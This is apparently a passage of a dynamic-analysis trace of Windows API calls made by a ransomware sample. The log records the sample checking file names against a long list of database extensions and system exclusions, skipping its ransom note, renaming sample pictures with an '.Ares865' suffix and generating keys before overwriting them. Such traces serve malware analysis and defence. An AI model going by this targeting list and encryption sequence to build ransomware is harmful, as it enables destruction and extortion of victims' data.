lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0045.058] lstrlenW (lpString="avhd") returned 4 [0045.058] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0045.058] lstrlenW (lpString="db") returned 2 [0045.058] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0045.058] lstrlenW (lpString="db2") returned 3 [0045.058] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0045.058] lstrlenW (lpString="db3") returned 3 [0045.058] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0045.058] lstrlenW (lpString="dbf") returned 3 [0045.058] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0045.058] lstrlenW (lpString="mdf") returned 3 [0045.058] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0045.058] lstrlenW (lpString="mdb") returned 3 [0045.058] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0045.058] lstrlenW (lpString="sql") returned 3 [0045.058] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0045.058] lstrlenW (lpString="sqlite") returned 6 [0045.058] lstrcmpiW (lpString1="sh.jpg", lpString2="sqlite") returned -1 [0045.058] lstrlenW (lpString="sqlite3") returned 7 [0045.058] lstrcmpiW (lpString1="ish.jpg", lpString2="sqlite3") returned -1 [0045.058] lstrlenW (lpString="sqlitedb") returned 8 [0045.058] lstrcmpiW (lpString1="fish.jpg", lpString2="sqlitedb") returned -1 [0045.058] lstrlenW (lpString="xml") returned 3 [0045.058] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0045.058] lstrlenW (lpString="$er") returned 3 [0045.058] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0045.058] lstrlenW (lpString="4dd") returned 3 [0045.058] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0045.058] lstrlenW (lpString="4dl") returned 3 [0045.058] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0045.058] lstrlenW (lpString="^^^") returned 3 [0045.058] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0045.058] lstrlenW (lpString="abs") returned 3 [0045.059] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0045.059] lstrlenW (lpString="abx") returned 3 [0045.059] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0045.059] lstrlenW (lpString="accdb") returned 5 [0045.059] lstrcmpiW (lpString1="h.jpg", lpString2="accdb") returned 1 [0045.059] lstrlenW (lpString="accdc") returned 5 [0045.059] lstrcmpiW (lpString1="h.jpg", lpString2="accdc") returned 1 [0045.059] lstrlenW (lpString="accde") returned 5 [0045.059] lstrcmpiW (lpString1="h.jpg", lpString2="accde") returned 1 [0045.059] lstrlenW (lpString="accdr") returned 5 [0045.059] lstrcmpiW (lpString1="h.jpg", lpString2="accdr") returned 1 [0045.059] lstrlenW (lpString="accdt") returned 5 [0045.059] lstrcmpiW (lpString1="h.jpg", lpString2="accdt") returned 1 [0045.059] lstrlenW (lpString="accdw") returned 5 [0045.059] lstrcmpiW (lpString1="h.jpg", lpString2="accdw") returned 1 [0045.059] lstrlenW (lpString="accft") returned 5 [0045.059] lstrcmpiW (lpString1="h.jpg", lpString2="accft") returned 1 [0045.059] lstrlenW (lpString="adb") returned 3 [0045.059] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0045.059] lstrlenW (lpString="adb") returned 3 [0045.059] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0045.059] lstrlenW (lpString="ade") returned 3 [0045.059] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0045.059] lstrlenW (lpString="adf") returned 3 [0045.059] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0045.059] lstrlenW (lpString="adn") returned 3 [0045.059] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0045.059] lstrlenW (lpString="adp") returned 3 [0045.059] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0045.059] lstrlenW (lpString="alf") returned 3 [0045.059] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0045.059] lstrlenW (lpString="ask") returned 3 [0045.059] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0045.059] lstrlenW (lpString="btr") returned 3 [0045.059] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0045.060] lstrlenW (lpString="cat") returned 3 [0045.060] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0045.060] lstrlenW (lpString="cdb") returned 3 [0045.060] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0045.060] lstrlenW (lpString="ckp") returned 3 [0045.060] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0045.060] lstrlenW (lpString="cma") returned 3 [0045.060] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0045.060] lstrlenW (lpString="cpd") returned 3 [0045.060] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0045.060] lstrlenW (lpString="dacpac") returned 6 [0045.060] lstrcmpiW (lpString1="sh.jpg", lpString2="dacpac") returned 1 [0045.060] lstrlenW (lpString="dad") returned 3 [0045.060] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0045.060] lstrlenW (lpString="dadiagrams") returned 10 [0045.060] lstrcmpiW (lpString1="lyfish.jpg", lpString2="dadiagrams") returned 1 [0045.060] lstrlenW (lpString="daschema") returned 8 [0045.060] lstrcmpiW (lpString1="fish.jpg", lpString2="daschema") returned 1 [0045.060] lstrlenW (lpString="db-journal") returned 10 [0045.060] lstrcmpiW (lpString1="lyfish.jpg", lpString2="db-journal") returned 1 [0045.060] lstrlenW (lpString="db-shm") returned 6 [0045.060] lstrcmpiW (lpString1="sh.jpg", lpString2="db-shm") returned 1 [0045.060] lstrlenW (lpString="db-wal") returned 6 [0045.060] lstrcmpiW (lpString1="sh.jpg", lpString2="db-wal") returned 1 [0045.060] lstrlenW (lpString="dbc") returned 3 [0045.060] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0045.060] lstrlenW (lpString="dbs") returned 3 [0045.060] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0045.060] lstrlenW (lpString="dbt") returned 3 [0045.060] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0045.060] lstrlenW (lpString="dbv") returned 3 [0045.060] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0045.060] lstrlenW (lpString="dbx") returned 3 [0045.060] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0045.061] lstrlenW (lpString="dcb") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0045.061] lstrlenW (lpString="dct") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0045.061] lstrlenW (lpString="dcx") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0045.061] lstrlenW (lpString="ddl") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0045.061] lstrlenW (lpString="dlis") returned 4 [0045.061] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0045.061] lstrlenW (lpString="dp1") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0045.061] lstrlenW (lpString="dqy") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0045.061] lstrlenW (lpString="dsk") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0045.061] lstrlenW (lpString="dsn") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0045.061] lstrlenW (lpString="dtsx") returned 4 [0045.061] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0045.061] lstrlenW (lpString="dxl") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0045.061] lstrlenW (lpString="eco") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0045.061] lstrlenW (lpString="ecx") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0045.061] lstrlenW (lpString="edb") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0045.061] lstrlenW (lpString="epim") returned 4 [0045.061] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0045.061] lstrlenW (lpString="fcd") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0045.061] lstrlenW (lpString="fdb") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0045.061] lstrlenW (lpString="fic") returned 3 [0045.061] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0045.062] lstrlenW (lpString="flexolibrary") returned 12 [0045.062] lstrcmpiW (lpString1="ellyfish.jpg", lpString2="flexolibrary") returned -1 [0045.062] lstrlenW (lpString="fm5") returned 3 [0045.062] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0045.062] lstrlenW (lpString="fmp") returned 3 [0045.062] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0045.062] lstrlenW (lpString="fmp12") returned 5 [0045.062] lstrcmpiW (lpString1="h.jpg", lpString2="fmp12") returned 1 [0045.062] lstrlenW (lpString="fmpsl") returned 5 [0045.062] lstrcmpiW (lpString1="h.jpg", lpString2="fmpsl") returned 1 [0045.062] lstrlenW (lpString="fol") returned 3 [0045.062] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0045.062] lstrlenW (lpString="fp3") returned 3 [0045.062] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0045.062] lstrlenW (lpString="fp4") returned 3 [0045.062] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0045.062] lstrlenW (lpString="fp5") returned 3 [0045.062] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0045.062] lstrlenW (lpString="fp7") returned 3 [0045.062] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0045.062] lstrlenW (lpString="fpt") returned 3 [0045.062] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0045.062] lstrlenW (lpString="frm") returned 3 [0045.062] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0045.062] lstrlenW (lpString="gdb") returned 3 [0045.062] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0045.062] lstrlenW (lpString="gdb") returned 3 [0045.062] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0045.062] lstrlenW (lpString="grdb") returned 4 [0045.062] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0045.062] lstrlenW (lpString="gwi") returned 3 [0045.062] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0045.062] lstrlenW (lpString="hdb") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0045.063] lstrlenW (lpString="his") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0045.063] lstrlenW (lpString="ib") returned 2 [0045.063] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0045.063] lstrlenW (lpString="idb") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0045.063] lstrlenW (lpString="ihx") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0045.063] lstrlenW (lpString="itdb") returned 4 [0045.063] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0045.063] lstrlenW (lpString="itw") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0045.063] lstrlenW (lpString="jet") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0045.063] lstrlenW (lpString="jtx") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0045.063] lstrlenW (lpString="kdb") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0045.063] lstrlenW (lpString="kexi") returned 4 [0045.063] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0045.063] lstrlenW (lpString="kexic") returned 5 [0045.063] lstrcmpiW (lpString1="h.jpg", lpString2="kexic") returned -1 [0045.063] lstrlenW (lpString="kexis") returned 5 [0045.063] lstrcmpiW (lpString1="h.jpg", lpString2="kexis") returned -1 [0045.063] lstrlenW (lpString="lgc") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0045.063] lstrlenW (lpString="lwx") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0045.063] lstrlenW (lpString="maf") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0045.063] lstrlenW (lpString="maq") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0045.063] lstrlenW (lpString="mar") returned 3 [0045.063] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0045.064] lstrlenW (lpString="marshal") returned 7 [0045.064] lstrcmpiW (lpString1="ish.jpg", lpString2="marshal") returned -1 [0045.064] lstrlenW (lpString="mas") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0045.064] lstrlenW (lpString="mav") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0045.064] lstrlenW (lpString="maw") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0045.064] lstrlenW (lpString="mdbhtml") returned 7 [0045.064] lstrcmpiW (lpString1="ish.jpg", lpString2="mdbhtml") returned -1 [0045.064] lstrlenW (lpString="mdn") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0045.064] lstrlenW (lpString="mdt") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0045.064] lstrlenW (lpString="mfd") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0045.064] lstrlenW (lpString="mpd") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0045.064] lstrlenW (lpString="mrg") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0045.064] lstrlenW (lpString="mud") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0045.064] lstrlenW (lpString="mwb") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0045.064] lstrlenW (lpString="myd") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0045.064] lstrlenW (lpString="ndf") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0045.064] lstrlenW (lpString="nnt") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0045.064] lstrlenW (lpString="nrmlib") returned 6 [0045.064] lstrcmpiW (lpString1="sh.jpg", lpString2="nrmlib") returned 1 [0045.064] lstrlenW (lpString="ns2") returned 3 [0045.064] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0045.064] lstrlenW (lpString="ns3") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0045.065] lstrlenW (lpString="ns4") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0045.065] lstrlenW (lpString="nsf") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0045.065] lstrlenW (lpString="nv") returned 2 [0045.065] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0045.065] lstrlenW (lpString="nv2") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0045.065] lstrlenW (lpString="nwdb") returned 4 [0045.065] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0045.065] lstrlenW (lpString="nyf") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0045.065] lstrlenW (lpString="odb") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0045.065] lstrlenW (lpString="odb") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0045.065] lstrlenW (lpString="oqy") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0045.065] lstrlenW (lpString="ora") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0045.065] lstrlenW (lpString="orx") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0045.065] lstrlenW (lpString="owc") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0045.065] lstrlenW (lpString="p96") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0045.065] lstrlenW (lpString="p97") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0045.065] lstrlenW (lpString="pan") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0045.065] lstrlenW (lpString="pdb") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0045.065] lstrlenW (lpString="pdm") returned 3 [0045.065] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0045.065] lstrlenW (lpString="pnz") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0045.066] lstrlenW (lpString="qry") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0045.066] lstrlenW (lpString="qvd") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0045.066] lstrlenW (lpString="rbf") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0045.066] lstrlenW (lpString="rctd") returned 4 [0045.066] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0045.066] lstrlenW (lpString="rod") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0045.066] lstrlenW (lpString="rodx") returned 4 [0045.066] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0045.066] lstrlenW (lpString="rpd") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0045.066] lstrlenW (lpString="rsd") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0045.066] lstrlenW (lpString="sas7bdat") returned 8 [0045.066] lstrcmpiW (lpString1="fish.jpg", lpString2="sas7bdat") returned -1 [0045.066] lstrlenW (lpString="sbf") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0045.066] lstrlenW (lpString="scx") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0045.066] lstrlenW (lpString="sdb") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0045.066] lstrlenW (lpString="sdc") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0045.066] lstrlenW (lpString="sdf") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0045.066] lstrlenW (lpString="sis") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0045.066] lstrlenW (lpString="spq") returned 3 [0045.066] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0045.066] lstrlenW (lpString="te") returned 2 [0045.067] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0045.067] lstrlenW (lpString="teacher") returned 7 [0045.067] lstrcmpiW (lpString1="ish.jpg", lpString2="teacher") returned -1 [0045.067] lstrlenW (lpString="tmd") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0045.067] lstrlenW (lpString="tps") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0045.067] lstrlenW (lpString="trc") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0045.067] lstrlenW (lpString="trc") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0045.067] lstrlenW (lpString="trm") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0045.067] lstrlenW (lpString="udb") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0045.067] lstrlenW (lpString="udl") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0045.067] lstrlenW (lpString="usr") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0045.067] lstrlenW (lpString="v12") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0045.067] lstrlenW (lpString="vis") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0045.067] lstrlenW (lpString="vpd") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0045.067] lstrlenW (lpString="vvv") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0045.067] lstrlenW (lpString="wdb") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0045.067] lstrlenW (lpString="wmdb") returned 4 [0045.067] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0045.067] lstrlenW (lpString="wrk") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0045.067] lstrlenW (lpString="xdb") returned 3 [0045.067] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0045.068] lstrlenW (lpString="xld") returned 3 [0045.068] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0045.068] lstrlenW (lpString="xmlff") returned 5 [0045.068] lstrcmpiW (lpString1="h.jpg", lpString2="xmlff") returned -1 [0045.068] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.Ares865") returned 62 [0045.068] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.ares865"), dwFlags=0x1) returned 1 [0045.110] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x168 [0045.110] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=775702) returned 1 [0045.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0045.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0045.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0045.110] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0045.111] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0045.111] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0045.111] CreateFileMappingW (hFile=0x168, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbd920, lpName=0x0) returned 0x118 [0045.113] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbd920) returned 0x1120000 [0045.991] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0045.992] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0045.992] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0045.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6030 [0045.992] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6030 | out: hHeap=0x2b0000) returned 1 [0045.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2e2818 [0045.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0045.992] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2818 | out: hHeap=0x2b0000) returned 1 [0045.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0045.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cc260 [0045.993] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0045.993] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc260 | out: hHeap=0x2b0000) returned 1 [0045.993] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0045.993] UnmapViewOfFile (lpBaseAddress=0x1120000) returned 1 [0046.000] CloseHandle (hObject=0x118) returned 1 [0046.000] CloseHandle (hObject=0x168) returned 1 [0046.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0046.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0046.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0046.013] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Koala.jpg", cAlternateFileName="")) returned 1 [0046.013] lstrcmpiW (lpString1="Koala.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0046.013] lstrcmpiW (lpString1="Koala.jpg", lpString2="aoldtz.exe") returned 1 [0046.013] lstrcmpiW (lpString1="Koala.jpg", lpString2=".") returned 1 [0046.013] lstrcmpiW (lpString1="Koala.jpg", lpString2="..") returned 1 [0046.013] lstrcmpiW (lpString1="Koala.jpg", lpString2="windows") returned -1 [0046.013] lstrcmpiW (lpString1="Koala.jpg", lpString2="bootmgr") returned 1 [0046.013] lstrcmpiW (lpString1="Koala.jpg", lpString2="temp") returned -1 [0046.013] lstrcmpiW (lpString1="Koala.jpg", lpString2="pagefile.sys") returned -1 [0046.013] lstrcmpiW (lpString1="Koala.jpg", lpString2="boot") returned 1 [0046.013] lstrcmpiW (lpString1="Koala.jpg", lpString2="ids.txt") returned 1 [0046.013] lstrcmpiW (lpString1="Koala.jpg", lpString2="ntuser.dat") returned -1 [0046.013] lstrcmpiW (lpString1="Koala.jpg", lpString2="perflogs") returned -1 [0046.014] lstrcmpiW (lpString1="Koala.jpg", lpString2="MSBuild") returned -1 [0046.014] lstrlenW (lpString="Koala.jpg") returned 9 [0046.014] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 54 [0046.014] lstrcpyW (in: lpString1=0x2cce452, lpString2="Koala.jpg" | out: lpString1="Koala.jpg") returned="Koala.jpg" [0046.014] lstrlenW (lpString="Koala.jpg") returned 9 [0046.014] lstrlenW (lpString="Ares865") returned 7 [0046.014] lstrcmpiW (lpString1="ala.jpg", lpString2="Ares865") returned -1 [0046.014] lstrlenW (lpString=".dll") returned 4 [0046.014] lstrcmpiW (lpString1="Koala.jpg", lpString2=".dll") returned 1 [0046.014] lstrlenW (lpString=".lnk") returned 4 [0046.014] lstrcmpiW (lpString1="Koala.jpg", lpString2=".lnk") returned 1 [0046.046] lstrlenW (lpString=".ini") returned 4 [0046.046] lstrcmpiW (lpString1="Koala.jpg", lpString2=".ini") returned 1 [0046.046] lstrlenW (lpString=".sys") returned 4 [0046.046] lstrcmpiW (lpString1="Koala.jpg", lpString2=".sys") returned 1 [0046.046] lstrlenW (lpString="Koala.jpg") returned 9 [0046.046] 